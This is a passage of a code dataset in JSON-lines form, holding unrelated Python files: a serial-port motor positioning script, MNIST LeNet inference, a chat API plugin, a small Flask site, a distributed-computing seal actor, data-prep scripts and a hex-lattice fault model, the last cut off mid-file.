3: \n if str(sys.argv[unit_num + 1]) == \"x\" or int(sys.argv[unit_num + 1] == -1):\n ext_pos = -1\n else:\n try:\n ext_pos = int(sys.argv[unit_num + 1])\n except(ValueError):\n print(\"Positions must be integer values between 0 and the corresponding bandlength (9500 mm (unit 1), 8690 mm (unit 2), 9500 mm (unit 3)), or <-1> or to keep the current position.\")\n sys.exit(1)\n \n elif len(sys.argv) - 1 == 1:\n try:\n ext_pos = int(sys.argv[1]) \n except(ValueError):\n print(\"Positions must be integer values between 0 and the corresponding bandlength (9500 mm (unit 1), 8690 mm (unit 2), 9500 mm (unit 3)), or <-1> or to keep the current position.\")\n sys.exit(1)\n \n else:\n print(\"Number of positions must be either 1 (for all units) or 3 (for all units individually). Use x to keep a unit at the current position.\")\n sys.exit(1)\n \n if -1 <= ext_pos <= length[unit_num]:\n end_pos.append(ext_pos) \n else:\n print(\"Positions must be integer values between 0 and the corresponding bandlength (9500 mm (unit 1), 8690 mm (unit 2), 9500 mm (unit 3)), or <-1> or to keep the current position.\")\n sys.exit(1)\n\n\n#prepare log-file\ntime_start = datetime.now().strftime(\"%H-%M-%S\")\ndate = datetime.now().strftime(\"%Y-%m-%d\") \nfile_name = datetime.now().strftime(\"%H-%M-%S\")\n\n#global port specification\nif platform.system() == \"Windows\":\n global_port_spec = 'COM'\n plat_sys = 1\n dir_name = 'C:/Users/ym-st/OneDrive/Desktop/GERDA_SIS/log/' + str(date)\n \nif platform.system() == \"Linux\":\n global_port_spec = '/dev/ttyMXUSB' \n plat_sys = 0 \n dir_name = 'log/' + str(date)\n \nport_spec = global_port_spec\nport += plat_sys\nport_spec += str(port)\n\nif not os.path.exists(dir_name):\n os.mkdir(dir_name)\n \nfile = open(dir_name +'/log-pos_' + file_name + '.txt', 'w')\nfile.write('Sending positions started at: ' + time_start + '\\n')\nfile.write('Script called with position specification (-1 <--> x (no movement)): ' + str(end_pos) + '\\n\\n')\n\n\n\n#checksum used to ensure correct communication\ndef check_sum (array): \n csum = (sum(array) & 255) ^ 255\n return csum\n\n\n#transmitting and receiving byte array\ndef tx_rx(tx_array, rx_length):\n communication_time = time.time() + 2 #maximal time span until communication is considered nonreliable 2 sec\n \n while True:\n if time.time() > communication_time:\n return 0\n \n #send tx_array\n ser = serial.Serial(port_spec, baudrate, timeout = 0.1)\n ser.write(bytearray(tx_array))\n \n #read in rx_array\n try:\n rx_array = ser.read(rx_length)\n rx_array = list(rx_array)\n acknow_byte = rx_array[2]\n ser.close()\n except (IndexError):\n ser.close()\n continue\n \n #check rx_array\n current_time = datetime.now().strftime(\"%H-%M-%S\")\n bits=['{0:08b}'.format(rx_array[n]) for n in range(len(rx_array))] \n \n if (rx_length == len(rx_array) and rx_array[0] == tx_array[0]): \n \n if (rx_length == 4 and acknow_byte != 0):\n print(\"Make sure that remote control mode is turned on!\")\n file.write(current_time + ': Make sure that remote control mode is turned on!\\n')\n file.write('Received bytes: ' + str(rx_array) + '\\n')\n file.write('Received bits: ' + str(bits) + '\\n')\n file.close()\n time.sleep(5)\n sys.exit(1)\n \n elif (rx_length == 6 and acknow_byte != 0):\n if acknow_byte == 1:\n print(\"Make sure that remote control mode is turned on!\")\n file.write(current_time + ': Make sure that remote control mode is turned on!\\n')\n if acknow_byte == 4:\n print(\"Position specifications invalid!\")\n file.write(current_time + ': Position specifications invalid!\\n')\n if acknow_byte == 8:\n print(\"A unit needs to be initialised before it can be moved!\")\n file.write(current_time + ': A unit needs to be initialised before it can be moved!\\n')\n \n file.write('Received bytes: ' + str(rx_array) + '\\n')\n file.write('Received bits: ' + str(bits) + '\\n')\n file.close()\n time.sleep(5)\n sys.exit(1)\n \n else:\n return rx_array\n \n time.sleep(0.1)\n \n \n \n \n#internal commands needed for approaching positions:\n#stop(): stop command is sent to all units; script is terminated, and exits on 1\n#get_status(): get current status for all units (1, 2, 3), returns initialisation and motor status of all 3 units\n#get_position(): get current positions (in mm) of units (1, 2, 3)\n#goto_position(unit, pos): send position to unit\n\n\ndef stop():\n err = 0\n cmd_byte = 195\n rx_length = 4\n \n for unit_num in range(3):\n #prepare tx_array\n tx_array = [cmd_byte,\n unit_num,\n cmd_byte ^ 255,\n unit_num ^ 255,\n cmd_byte ^ 255,\n unit_num ^ 255]\n tx_array.append(check_sum(tx_array))\n \n #send and receive\n rx_array = tx_rx(tx_array, rx_length)\n if rx_array == 0:\n err += 1 \n\n #error handling\n current_time = datetime.now().strftime(\"%H-%M-%S\") \n if err > 0:\n print(\"Communication error occured when sending stop command as backstop!\")\n file.write(current_time + ': Communication error occured when sending stop command as backstop!\\n') \n else:\n print(\"Stop command sent to each unit!\")\n file.write(current_time + ': Stop command sent to each unit!\\n')\n \n file.close()\n time.sleep(5)\n sys.exit(1)\n\n\ndef get_status(): \n err = 0\n cmd_byte = 51\n rx_length = 15\n \n rx_init = []\n rx_motor = [] \n rx_bits = []\n rx_bytes = []\n rx_status = []\n rx_error = []\n \n #prepare tx_array\n tx_array = [cmd_byte,\n 0,\n 0,\n 0,\n 0,\n 0] \n tx_array.append(check_sum(tx_array))\n \n #send and receive\n rx_array = tx_rx(tx_array, rx_length)\n if rx_array == 0:\n err += 1\n rx_init.extend((-1111, -1111, -1111))\n rx_motor.extend((-1111, -1111, -1111)) \n rx_bits.extend((-1111, -1111, -1111))\n rx_bytes.extend((-1111, -1111, -1111))\n rx_status.extend((-1111, -1111, -1111))\n rx_error.extend((-1111, -1111, -1111))\n \n #data processing\n else: \n rx_bits.append(['{0:08b}'.format(rx_array[n]) for n in range(len(rx_array))]) \n rx_bytes.append(rx_array) \n \n for unit_num in range(3):\n #initialisation status\n rx_init.append(rx_array[8 + unit_num] >> 2 & 1) \n #state of motor movement\n rx_motor.append(rx_array[8 + unit_num] & 3) \n #status flags\n rx_status.append(rx_array[8 + unit_num])\n #error flags\n rx_error.append(rx_array[11 + unit_num])\n \n print(\"----------Movement (0: idle/break, 1: down, 2: up):\",str(rx_motor))\n print(\"----------Initialisitaion status (0: not init., 1: init.):\",str(rx_init))\n print(\"----------Status flags:\",str(rx_status))\n print(\"----------Error flags:\",str(rx_error))\n\n current_time = datetime.now().strftime(\"%H-%M-%S\") \n file.write(current_time + ': Status check:\\n')\n file.write('Received bytes: ' + str(rx_bytes) + '\\n')\n file.write('Received bits: ' + str(rx_bits) + '\\n')\n file.write('Movement (0: idle/break, 1: down, 2: up): ' + str(rx_motor) + '\\n')\n file.write('Initialisitaion status (0: not init., 1: init.): ' + str(rx_init) + '\\n')\n file.write('Status flags: ' + str(rx_status) + '\\n') \n file.write('Error flags: ' + str(rx_error) + '\\n') \n\n status = [rx_init, rx_motor]\n \n #error handling \n if err > 0:\n print(\"Communication error occured during status check!\")\n file.write(current_time + ': Communication error occured during status check!\\n')\n stop()\n \n return status\n\n\ndef get_position(): \n err = 0\n cmd_byte = 85\n rx_length = 20\n \n inc_pos = []\n abs_pos = []\n discr = []\n pos = []\n \n #prepare tx_array\n cmd_byte = 85\n tx_array = [cmd_byte,\n 0,\n 0,\n 0,\n 0,\n 0]\n tx_array.append(check_sum(tx_array))\n \n #send and receive\n rx_array = tx_rx(tx_array, rx_length)\n if rx_array == 0:\n err += 1\n inc_pos.extend((-1111, -1111, -1111))\n abs_pos.extend((-1111, -1111, -1111))\n discr.extend((-1111, -1111, -1111))\n pos.extend((-1111, -1111, -1111))\n \n #data processing\n else:\n for unit_num in range(3):\n inc_pos.append(256 * rx_array[4 + 4 * unit_num] + rx_array[3 + 4 * unit_num])\n abs_pos.append(256 * rx_array[2 + 4 * unit_num] + rx_array[1 + 4 * unit_num])\n discr.append(inc_pos[unit_num] - abs_pos[unit_num])\n \n for unit_num in range(3):\n if not -20 <= inc_pos[unit_num] <= length[unit_num] + 100:\n inc_pos[unit_num] = -9999\n if not -20 <= abs_pos[unit_num] <= length[unit_num] + 100:\n abs_pos[unit_num] = -9999\n if (not -999 < discr[unit_num] < 999) or inc_pos[unit_num] == -9999 or abs_pos[unit_num] == -9999:\n discr[unit_num] = -9999\n \n #positions to be saved and returned\n if inc_pos[unit_num] != -9999:\n pos.append(inc_pos[unit_num])\n else:\n pos.append(abs_pos[unit_num])\n \n print(\"----------Incremental encoder:\",str(inc_pos)) \n print(\"----------Absolute encoder:\",str(abs_pos)) \n print(\"----------Discrepancies (incremental - absolute):\",str(discr)) \n print(\"\\nCURRENT POSITIONS:\",str(pos),\"\\n\")\n pos_file = open('current_positions.txt', 'w')\n pos_file.write('Positions:\\n' + str(pos) + '\\nIncremental encoder:\\n' + str(inc_pos) + '\\nAbsolute encoder:\\n' + str(abs_pos) + '\\nDiscrepancies (incremental - absolute):\\n' + str(discr))\n pos_file.close()\n \n current_time = datetime.now().strftime(\"%H-%M-%S\") \n file.write(current_time + ': Current positions: \\n')\n file.write('Incremental encoder: ' + str(inc_pos) + '\\n')\n file.write('Absolute encoder: ' + str(abs_pos) + '\\n') \n file.write('Discrepancies (incremental - absolute): ' + str(discr) + '\\n')\n \n #error handling \n if err > 0:\n print(\"Communication error occured during position check!\")\n file.write(current_time + ': Communication error occured during position check!\\n')\n stop()\n \n return pos\n \n\ndef goto_position(unit_num, pos):\n err = 0\n cmd_byte = 15\n rx_length = 6\n \n #prepare tx_array\n pos_lsb = pos & 255\n pos_msb = pos // 256\n tx_array = [cmd_byte,\n unit_num,\n pos_lsb,\n pos_msb,\n cmd_byte ^ 255,\n unit_num ^ 255]\n \n tx_array.append(check_sum(tx_array))\n \n #send and receive\n rx_array = tx_rx(tx_array, rx_length)\n if rx_array == 0:\n err += 1\n\n #error handling\n current_time = datetime.now().strftime(\"%H-%M-%S\")\n if err > 0:\n print(\"Communication error occured during transmission of desired position to units!\")\n file.write(current_time + ': Communication error occured during transmission of desired position to units!\\n')\n stop() \n\n\n\n\n#main program\n \n#check current position, transmit desired positions, print expected time needed to finish \nstatus = get_status()\npos = get_position()\ndiff = [0, 0, 0]\n\nfor unit_num in range(3):\n if end_pos[unit_num] != -1: \n diff[unit_num] = abs(pos[unit_num] - end_pos[unit_num])\n goto_position(unit_num, end_pos[unit_num])\n else:\n end_pos[unit_num] = pos[unit_num]\n \nprint(\"Next stop positions:\",str(end_pos),\"\\n\")\nfile.write('Next stop positions: ' + str(end_pos) + '\\n') \n\nt = int(max(diff) / v + 1)\n \ncurrent_time = datetime.now().strftime(\"%H-%M-%S\")\nprint(\"Expected time needed to approach positions (in sec):\",str(t),\"\\n\")\nfile.write(current_time + ': Expected time needed to approach positions (in sec): ' + str(t) + '\\n')\n \n#check positions and motor status during movement\nmax_time = time.time() + 60*20 #maximal waiting time 20 mins\nwhile True:\n \n current_time = datetime.now().strftime(\"%H-%M-%S\")\n if time.time() > max_time:\n print(\"Maximum waiting time has expired. Make sure that communication works properly.\")\n file.write(current_time + ': Maximum waiting time has expired. Make sure that communication works properly.\\n')\n stop()\n \n if 0 <= t <= delta_t:\n time.sleep(t)\n else:\n time.sleep(delta_t) \n \n status = get_status()\n pos = get_position()\n motor = status[1]\n \n #exit loop when motor(s) has/have stopped\n if all(elem == 0 for elem in motor):\n time.sleep(1)\n break\n \n#check that positions have been approached, and finish log-file \ndev = [pos[unit_num] - end_pos[unit_num] for unit_num in range(3)]\n\ntime_end = datetime.now().strftime(\"%H-%M-%S\")\n\nif all(abs(elem) <= prec for elem in dev):\n file.write('\\nPositions approached at: ' + time_end + '\\n')\n file.close()\n print(\"Positions approached.\")\n \nelse:\n file.write(current_time + ': Positions could not be approached successfully!\\n')\n file.close()\n print(\"Positions could not be approached successfully!\")\n sys.exit(1)\n \n#exit(0) \n \n \n\n","sub_path":"GERDA_SIS/pos.py","file_name":"pos.py","file_ext":"py","file_size_in_byte":15472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"189755307","text":"import numpy as np\nfrom mnist import MNIST\nfrom lenet import Lenet, relpath\n\n# -- load mnist data --\n\nmndata = MNIST(relpath('../data'))\nimages, labels = mndata.load_testing()\n\n# -- lenet inference --\n\nright = 0.\ntotal = 0.\n\nfor image, label in zip(images[:1000], labels[:1000]):\n print('LABEL:', label)\n #print(mndata.display(image))\n inputs = np.array(image, dtype=np.float32)\n inputs = np.reshape(image, (1, 28, 28))\n inputs = inputs * 0.00390625\n logits = Lenet(inputs)\n answer = np.unravel_index(np.argmax(logits, axis=None), logits.shape)[0]\n print('ANSWER:', answer)\n\n if label == answer:\n right += 1.\n total += 1.\n\nprint('ACCURACY:', right/total)\n\n","sub_path":"src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"1216797","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom app import utils\nimport requests\n\n\nasync def chat_content(message):\n # 聊天的API地址    \n url = \"https://api.ai.qq.com/fcgi-bin/nlp/nlp_textchat\"\n # 获取请求参数  \n message = message.encode('utf-8')\n payload = utils.get_params(question=message, session='10000')\n # r = requests.get(url, params=payload)    \n r = requests.post(url, data=payload)\n if int(r.json()['ret']) != 0:\n return \"不听不听\"\n return r.json()[\"data\"][\"answer\"]\n\n\nasync def translation_content(target_language, message):\n url = \"https://api.ai.qq.com/fcgi-bin/nlp/nlp_texttranslate\"\n language_dict = {\n \"日语\": 'jp',\n \"英语\": 'en',\n \"韩语\": 'kr'\n }\n message = message.encode('utf-8')\n target_language = language_dict[target_language]\n payload = utils.get_params(target=target_language, source='zh', text=message)\n r = requests.post(url, data=payload)\n if int(r.json()['ret']) != 0:\n return \"我不会吖(ㄒoㄒ)\"\n return r.json()[\"data\"][\"target_text\"]\n","sub_path":"app/plugins/qq_api/data_source.py","file_name":"data_source.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"437841238","text":"from flask import Flask, render_template\nimport datetime\nimport subprocess\napp = Flask( __name__ )\n\n@app .route( \"/\" )\ndef index():\n return \"Test page\"\n return \"<html><body><h1>This is my Site (Flask)</h1></body></html>\"\n\n@app.route(\"/Test01\")\ndef hello():\n now = datetime.datetime.now()\n timeString = now.strftime(\"%Y-%m-%d %H:%M\")\n templateData = {\n 'title' : 'RaspberryPi',\n 'time': timeString\n }\n return render_template('myTemplate03.html', **templateData)\n\n@app.route(\"/PioneerPi\")\ndef pioneerpi():\n now = datetime.datetime.now()\n timeString = now.strftime(\"%Y-%m-%d %H:%M\")\n templateData = {\n 'title' : 'PionnerPi',\n 'time': timeString\n }\n return render_template('myTemplate03.html', **templateData)\n\n@app.route(\"/\")\ndef action(DeviceName):\n return DeviceName\n\n\n@app.route(\"/Info\")\ndef getInfo():\n command = ['systemctl','status','raspotify']\n result = subprocess.run(['ls', '-l'], stdout=subprocess.PIPE)\n result = subprocess.run(command, stdout=subprocess.PIPE)\n return result.stdout\n\n \nif __name__ == \"__main__\" :\n app.run( host = '0.0.0.0' , debug = True )\n\n","sub_path":"REFERENCE/pi/mySite/mySite2.py","file_name":"mySite2.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"618878786","text":"def validate(inputs):\n if inputs == '':\n return False\n return True\n\ndef hello(name):\n print('Hello ' + name + '.')\n\ninput_name=input('Input your Name.:')\n\nif validate(input_name) == False:\n print('Name is required.')\nelse:\n hello(input_name)\n","sub_path":"python_lesson/lesson3/sample/script3-9.py","file_name":"script3-9.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"238513186","text":"\"\"\"\nGiven all the images in one single folder (the one that came on the zip file)\nseparetes them in two folders, train (80% of the images) and val (20% of the images)\n\"\"\"\n\nimport os\nimport numpy as np\n\n\nn_files = 202599\noriginal_folder = '../img_align_celeba'\ntrain_folder = '../train'\nval_folder = '../val'\n\n\nall_files = np.arange(1, n_files + 1)\nnp.random.shuffle(all_files)\n\ntrain = all_files[:int(0.8 * n_files)]\nval = all_files[int(0.8 * n_files):]\n\nfor i, file_idx in enumerate(train):\n os.rename(f'{original_folder}/{file_idx:06d}.jpg', f'{train_folder}/{i:06d}.jpg')\n\nfor i, file_idx in enumerate(val):\n os.rename(f'{original_folder}/{file_idx:06d}.jpg', f'{val_folder}/{i:06d}.jpg')","sub_path":"src/split_data.py","file_name":"split_data.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"555616475","text":"class Solution(object):\n def duplicateInArray(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype int\n \"\"\"\n if nums == [] or max(nums) > len(nums) - 1:\n return -1\n\n # 取值范围\n start = 1\n end = len(nums) - 1\n\n while start < end:\n mid = (start + end) >> 1 # 取值范围划分为[start, mid], [mid+1, end]\n\n count = 0 \n for num in nums:\n if num >= start and num <= mid: # 统计半边\n count += 1\n\n if count > mid - start + 1:\n end = mid\n else:\n start = mid + 1\n\n return end # 当 start = end 结束查找\n","sub_path":"剑指offer/Week01/不修改数组找出重复数字/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"473150517","text":"# Copyright 1999-2018 Alibaba Group Holding Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport numpy as np\nimport pyarrow\n\nfrom ..config import options\nfrom ..errors import SpillNotConfigured\nfrom ..serialize import dataserializer\nfrom ..utils import log_unhandled\nfrom .spill import build_spill_file_name\nfrom .utils import WorkerActor\n\n\nclass SealActor(WorkerActor):\n \"\"\"\n Actor sealing a chunk from a serials of record chunks.\n \"\"\"\n @staticmethod\n def gen_uid(session_id, chunk_key):\n return 's:0:seal$%s$%s' % (session_id, chunk_key)\n\n def __init__(self):\n super(SealActor, self).__init__()\n self._chunk_holder_ref = None\n self._mem_quota_ref = None\n\n def post_create(self):\n from .chunkholder import ChunkHolderActor\n from .quota import MemQuotaActor\n super(SealActor, self).post_create()\n self._chunk_holder_ref = self.promise_ref(ChunkHolderActor.default_uid())\n self._mem_quota_ref = self.promise_ref(MemQuotaActor.default_uid())\n\n @log_unhandled\n def seal_chunk(self, session_id, graph_key, chunk_key, keys, shape, record_type, dtype, fill_value):\n from ..serialize.dataserializer import decompressors, mars_serialize_context\n chunk_bytes_size = np.prod(shape) * dtype.itemsize\n self._mem_quota_ref.request_batch_quota({chunk_key: chunk_bytes_size})\n if fill_value is None:\n ndarr = np.zeros(shape, dtype=dtype)\n else:\n ndarr = np.full(shape, fill_value, dtype=dtype)\n ndarr_ts = np.zeros(shape, dtype=np.dtype('datetime64[ns]'))\n\n # consolidate\n for key in keys:\n try:\n if self._chunk_store.contains(session_id, key):\n buf = self._chunk_store.get_buffer(session_id, key)\n else:\n file_name = build_spill_file_name(key)\n # The `disk_compression` is used in `_create_writer`\n disk_compression = dataserializer.CompressType(options.worker.disk_compression)\n if not file_name:\n raise SpillNotConfigured('Spill not configured')\n with open(file_name, 'rb') as inf:\n buf = decompressors[disk_compression](inf.read())\n buffer = pyarrow.deserialize(memoryview(buf), mars_serialize_context())\n record_view = np.asarray(memoryview(buffer)).view(dtype=record_type, type=np.recarray)\n\n for record in record_view:\n idx = np.unravel_index(record.index, shape)\n if record.ts > ndarr_ts[idx]:\n ndarr[idx] = record.value\n finally:\n del buf\n\n # clean up\n self._chunk_holder_ref.unregister_chunk(session_id, key)\n self.get_meta_client().delete_meta(session_id, key, False)\n self._mem_quota_ref.release_quota(key)\n\n # Hold the reference of the chunk before register_chunk\n chunk_ref = self._chunk_store.put(session_id, chunk_key, ndarr)\n self.get_meta_client().set_chunk_meta(session_id, chunk_key, size=chunk_bytes_size,\n shape=shape, workers=(self.address,))\n self._chunk_holder_ref.register_chunk(session_id, chunk_key)\n del chunk_ref\n","sub_path":"mars/worker/seal.py","file_name":"seal.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"141275424","text":"# Goal is to prepare the train.csv for modelling - here we can create a def/class\n# to apply to the different dataframes.\n# We want the dataframe of the following shape given the exploration :\n# target : number_capture\n# features : site_id, quarter, month, year, day_of_week, number_unique, likely_site, m_f_ratio\n\nimport pandas as pd\nimport numpy as np\nimport os\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import FormatStrFormatter\nimport calendar\n\nos.chdir(\"/Users/panthera_pardus/Documents/ds_projects/turtle_forcast\")\n\n#%% Read data\n# Since the goal is to forcast for 2019, let us separate the sets of 2017 and 2018\ndata = pd.read_csv(\"data/train.csv\")\ndata[\"dt_caught\"] = pd.to_datetime(data[\"Date_TimeCaught\"])\ndata.columns\n# Target : number_capture_day\ndf_target = data.groupby([\"CaptureSite\", \"Date_TimeCaught\"]).\\\ncount()[\"Rescue_ID\"].\\\nreset_index()\n\ndf_target[\"Site_Date\"] = df_target[\"CaptureSite\"] + \"_\" + df_target[\"Date_TimeCaught\"]\ndf_target[\"Site_Date\"] = df_target[\"Site_Date\"].str.replace(\"-\", \"\")\ndf_target[\"target\"] = df_target[\"Rescue_ID\"]\n\ndf_target = df_target[[\"Site_Date\", \"CaptureSite\", \"Date_TimeCaught\", \"target\"]]\n\n# Time dimension variables : quarter, month, year, day_of_week\ndata[\"quarter\"] = data.dt_caught.dt.quarter\ndata[\"month\"] = data.dt_caught.dt.month\ndata[\"day_of_week\"] = data.dt_caught.dt.dayofweek\n\ndf_time = data[[\"CaptureSite\", \"Date_TimeCaught\", \"quarter\", \"month\", \"day_of_week\"]]\ndf_time[\"Site_Date\"] = df_time[\"CaptureSite\"] + \"_\" + df_time[\"Date_TimeCaught\"]\ndf_time[\"Site_Date\"] = df_time[\"Site_Date\"].str.replace(\"-\", \"\")\n\ndf_time = df_time[[\"Site_Date\", \"quarter\", \"month\", \"day_of_week\"]]\n\n# Site dimension variables : number_unique_fishermen, likely_site, m_f_ratio\ndata.groupby(\"CaptureSite\").\\\ncount()\n","sub_path":"feature_engineering.py","file_name":"feature_engineering.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"210988969","text":"\"\"\"IR sentence\n\"\"\"\n\nclass IRSentence(object):\n \"\"\"\n Representation of Sentence.\n \"\"\"\n\n def __init__(self, text, bug_id = None):\n self.__text = text\n self.__bug_id = bug_id\n\n self.__termcount = None\n self.__tfidf = None\n\n def get_text(self):\n return self.__text\n\n def get_bug_id(self):\n return self.__bug_id\n\n def get_termcount(self):\n if self.__termcount is None:\n from ir_term_count import IRTermCount\n self.__termcount = \\\n IRTermCount.get_bow(self.get_text(), True)\n return self.__termcount\n\n def contain_term(self, term):\n if self.get_termcount().has_key(term):\n return True\n else:\n return False\n\n def get_tfidf(self):\n if self.__tfidf is None:\n from ir_config import IRConfig\n from ir_mongodb_helper import IRMongodbHelper\n from ir_tfidf import IRTFIDF\n description_name = IRConfig.get_instance().get('bug_description_name')\n tfidf_collection = IRMongodbHelper.get_instance().get_collection(\n 'bug_db_name', 'bug_tfidf_collection_name', False)\n bug_count = tfidf_collection.count()\n \n self.__tfidf = \\\n IRTFIDF.calculate_tfidf(self.get_termcount(),\n description_name, bug_count, None, 'tfidf')\n return self.__tfidf\n\n @classmethod\n def get_sentence_from_description(cls, description, bug_id = None):\n \"\"\"Generate sentences from description.\n\n Args:\n description: str\n bug_id: int\n\n Returns:\n [[ArIRSentence]\n \"\"\"\n \n import re\n sentences = []\n sentences_text = re.split('\\.[ \\n]|\\n\\n', description)\n for text in sentences_text:\n text.replace('\\n', ' ')\n sentences.append(IRSentence(text, bug_id))\n return sentences\n\n @classmethod\n def cluster_sentences(cls, sentences, n):\n \"\"\"Cluster the sentences into n clusters.\n\n Args:\n sentences: [IRSentence]\n n: int, number of clusters\n\n Returns:\n [int], group id of each sentence in sentences\n \"\"\"\n\n vol = set()\n for sentence in sentences:\n tfidf = sentence.get_tfidf()\n for term in tfidf:\n vol.add(term)\n vol = list(vol)\n vecs = []\n for sentence in sentences:\n tfidf = sentence.get_tfidf()\n vec = []\n for term in vol:\n if term in tfidf:\n vec.append(tfidf[term])\n else:\n vec.append(0.0)\n vecs.append(vec)\n # call pycluster k-means\n from Pycluster import kcluster, clustercentroids, distancematrix\n labels, error, nfound = kcluster(vecs, nclusters=n, method='a',\n dist='u')\n centroids, cmask = clustercentroids(vecs, clusterid=labels, method='a')\n sentence_ids = []\n for centroid_index, centroid in enumerate(centroids):\n # find vecs in the cluster\n subvecs = [centroid]\n subvecindexs = [-1]\n for label_index, label in enumerate(labels):\n if label == centroid_index:\n subvecs.append(vecs[label_index])\n subvecindexs.append(label_index)\n # find the min dist vec\n matrix = distancematrix(subvecs, dist='u')\n minimum = 100000\n minimum_index = 0\n for i in xrange(1, subvecs.__len__()):\n dist = matrix[i][0]\n if dist < minimum:\n minimum = dist\n minimum_index = subvecindexs[i]\n sentence_ids.append(minimum_index)\n\n # method='a')\n return labels, sentence_ids\n # return index of sentences, sentence of ids\n","sub_path":"server/bin/ir_sentence.py","file_name":"ir_sentence.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"387272692","text":"# -*- coding: utf-8 -*-\n# #####################################################################\n# Implement controlling module of instruments\n#\n#\n# Created: Sat Sep 15 20:33:19 2018\n# by: Jim Lin(jim.lin@silabs.com)\n#\n# #####################################################################\n\n\nimport visa\nimport pkgutil\nfrom xml_config import *\nimport instruments_drivers.E4405B\nimport instruments_drivers.E4432B\n\ndriver_modules = {\"E4405B\":instruments_drivers.E4405B,\n \"E4432B\":instruments_drivers.E4432B}\n# for _, name, __ in pkgutil.iter_modules(instruments_drivers.__path__):\n# if \"instbase\" != name:\n# m = _.find_module(\n# 'instruments_drivers.' +\n# name).load_module(\n# 'instruments_drivers.' +\n# name)\n# driver_modules[name] = m\n\n\ndef instru_get_modal(resid):\n # type: (object) -> object\n rm = visa.ResourceManager()\n inst = rm.open_resource(resid)\n inst.timeout = 500\n inst_info = inst.query(\"*IDN?\")\n inst_info = inst_info.splitlines(False)\n inst_info = inst_info[0]\n inst_info.strip()\n vendor, modal, serialno, version = inst_info.split(\",\")\n return modal.strip().encode(\"ascii\")\n\n\ndef instru_init_inst(resid, logfunc):\n modal = instru_get_modal(resid)\n driver = cfg_get_driver_name_bymodal(modal)\n if not driver:\n raise Exception(\"Drivers for instrument %s not found!\" % modal)\n driverclass = getattr(driver_modules[driver], driver)\n obj = driverclass(resid)\n if logfunc is not None:\n if obj is not None:\n logfunc(\n \"Initializing driver(%s) for modal(%s) success!\" %\n (driver, modal))\n else:\n logfunc(\n \"Initializing driver(%s) for modal(%s) fail!\" %\n (driver, modal))\n obj.reset_to_default()\n return obj\n","sub_path":"python/pyate/instruments.py","file_name":"instruments.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"541254966","text":"# -*- coding: utf-8 -*-\n\"\"\"\nhex_lattice_tectonicizer.py\n\nModels discrete normal-fault offset on a 2D hex lattice with a rectangular\nshape and with one orientation of the nodes being vertical.\n\nThe intention here is to use a particle (LCA) model to represent the evolution\nof a 2D hillslope, with the hex_lattice_tectonicizer serving to shift the nodes\neither upward (simple vertical uplift relative to baselevel), or up and\nsideways (representing motion on a fault plane).\n\nCreated on Mon Nov 17 08:01:49 2014\n\n@author: gtucker\n\"\"\"\n\nfrom landlab import HexModelGrid\nfrom numpy import amax, zeros, arange\nfrom pylab import figure\n\n_DEFAULT_NUM_ROWS = 20\n_DEFAULT_NUM_COLS = 15\n_TAN60 = 1.732\n\n\nclass HexLatticeTectonicizer(object):\n \"\"\"Base class from which classes to represent particular baselevel/fault\n geometries are derived.\n \"\"\"\n def __init__(self, grid=None, node_state=None):\n\n # If needed, create grid\n if grid is None:\n num_rows = _DEFAULT_NUM_ROWS\n num_cols = _DEFAULT_NUM_COLS\n self.grid = HexModelGrid(num_rows, num_cols, dx=1.0,\n orientation='vertical',\n shape='rect', reorient_links=True)\n else:\n # Make sure caller passed the right type of grid\n assert (grid.orientation=='vertical'), \\\n 'Grid must have vertical orientation'\n\n # Keep a reference to the grid\n self.grid = grid\n\n # If needed, create node-state grid\n if node_state is None:\n self.node_state = self.grid.add_zeros('node', 'node_state_map')\n else:\n self.node_state = node_state\n\n # Remember the # of rows and cols\n self.nr = self.grid.number_of_node_rows\n self.nc = self.grid.number_of_node_columns\n\n\nclass LatticeNormalFault(HexLatticeTectonicizer):\n \"\"\"Represents a 60 degree, left-dipping normal fault, and handles discrete\n offsets for a hex grid that has vertical columns and a rectangular shape.\n \"\"\"\n def __init__(self, fault_x_intercept=0.0, grid=None, node_state=None):\n\n # Do the base class init\n super(LatticeNormalFault, self).__init__(grid, node_state)\n\n # Set up data structures:\n # Make sure the footwall location is such that the fault actually\n # cuts across the grid. This means the x intercept has to be, at\n # the very least, no smaller than the biggest x-coordinate, and if\n # there is an even number of columns, it must be smaller than that\n # number minus 1/tangent 60 degrees (0.57735)\n assert (fault_x_intercept0:\n self.node_state[indices] = 